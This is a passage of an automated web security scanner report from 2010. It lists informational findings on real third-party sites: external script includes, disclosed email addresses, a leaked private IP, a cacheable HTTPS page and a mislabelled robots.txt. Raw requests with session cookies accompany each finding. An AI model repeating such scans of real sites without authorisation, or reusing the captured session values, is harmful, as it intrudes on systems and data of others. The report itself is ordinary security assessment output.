Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:16:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12208
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<div class="rightmenu"><a id="tmDoc" href='http://www.xwiki.org/xwiki/bin/view/Main/Documentation' onclick="openURL('http://www.xwiki.org/xwiki/bin/view/Main/Documentation', '_blank'); return false;"><strong>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. http://storegrid.vembu.com/404.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /404.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /404.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: storegrid.vembu.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmb=230392542.3.10.1289802285; __utmc=230392542; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); vhbsc=3vkq98e8n43m6gnh0u2qf9sff6

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:41:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 21728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Backup Software - Vembu StoreGrid - Custom error page</title>
<meta h
...[SNIP]...
</form>        
           <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>        
               <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=anparasu"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
           </script>
...[SNIP]...
<!--VISISTAT SNIPPET//-->
   <script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=8Lqu"></script>
...[SNIP]...

7.2. http://storegrid.vembu.com/forum/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /forum/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forum/ HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:41:18 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Set-Cookie: phpbb3_pkh3a_u=1; expires=Tue, 15-Nov-2011 15:41:18 GMT; path=/; domain=storegrid.vembu.com; HttpOnly
Set-Cookie: phpbb3_pkh3a_k=; expires=Tue, 15-Nov-2011 15:41:18 GMT; path=/; domain=storegrid.vembu.com; HttpOnly
Set-Cookie: phpbb3_pkh3a_sid=42751f5a5256c83fc048167c80e16c32; expires=Tue, 15-Nov-2011 15:41:18 GMT; path=/; domain=storegrid.vembu.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<head>
...[SNIP]...
</div>
               
           <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
           </script>
...[SNIP]...
<!--VISISTAT SNIPPET//-->
   <script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=8Lqu"></script>
...[SNIP]...

8. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /xwiki/bin/view/Main/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:11:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 26054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<li>important development choices are made on public nuxeo-dev@lists.nuxeo.com mailing list</li>
<li>any commit in the code can be followed on ecm-checkins@lists.nuxeo.com</li>
...[SNIP]...
<li>Send an email to ecm@lists.nuxeo.com AND nuxeo-dev@lists.nuxeo.com with the subject "Labels contribution proposal"</li>
...[SNIP]...
<li>Ask on ecm@lists.nuxeo.com a contributor account for nuxeo.org, with "Documentation contributor account request" in the subject.</li>
...[SNIP]...
<li>send an email to ecm@lists.nuxeo.com, to notify the community</li>
...[SNIP]...
<li>send an email to nuxeo-dev@lists.nuxeo.com and ecm@lists.nuxeo.com to notify them of your contribution</li>
...[SNIP]...
<li>send an email to ecm@lists.nuxeo.com and nuxeo-dev@lists.nuxeo.com, to notify the community, as well as Nuxeo developers.</li>
...[SNIP]...
<li>make the ticket goes to devReview and notify nuxeo-dev@lists.nuxeo.com that the ticket is available for review</li>
...[SNIP]...
<li>you can ask for a code review in the nuxeo-dev@lists.nuxeo.com mailing list.</li>
...[SNIP]...

9. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pro.vembu.com
Path:   /account.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /account.php?page=login&error=Please%20enter%20your%20Account%20ID%20and%20password%20before%20you%20click%20on%20the%20Login%20button.&header=Hold%20on!%20You%20clicked%20Login%20too%20fast! HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: vhbsc=3vkq98e8n43m6gnh0u2qf9sff6; __utma=57288555.332453333.1289802359.1289802359.1289802359.1; __utmb=57288555.2.10.1289802359; __utmc=57288555; __utmz=57288555.1289802359.1.1.utmcsr=vembu.com|utmccn=(referral)|utmcmd=referral|utmcct=/
Host: pro.vembu.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 15:20:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
<input type="hidden" name="ipaddress" style="width:65px;" value="10.207.110.10">
...[SNIP]...

10. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://jira.jboss.org
Path:   /plugins/servlet/gadgets/rpc-relay

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /plugins/servlet/gadgets/rpc-relay HTTP/1.1
Host: jira.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:27:21 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 567x992647x30
X-ASESSIONID: 3jsbox
X-AUSERNAME: anonymous
Content-Type: text/html;charset=UTF-8
Content-Length: 209
Vary: Accept-Encoding
Connection: close

<script>
var u = location.href, h = u.substr(u.indexOf('#') + 1).split('&'), t, r;
try {
t = h[0] === '..' ? parent.parent : parent.frames[h[0]];
r = t.gadgets.rpc.receive;
} catch (e) {
}
r && r(h);

...[SNIP]...

11. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://storegrid.vembu.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /robots.txt HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:41:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 20 Oct 2010 10:45:12 GMT
ETag: "129d87c4-243f-4930a1a987e00"
Accept-Ranges: bytes
Content-Length: 9279
Connection: close
Content-Type: text/plain

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFind
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Nutch
Disallow: /

User-agent: Jetbot/1.0
Disallow: /

User-agent: Jetbot
Dis
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 16:56:58 CST 2010.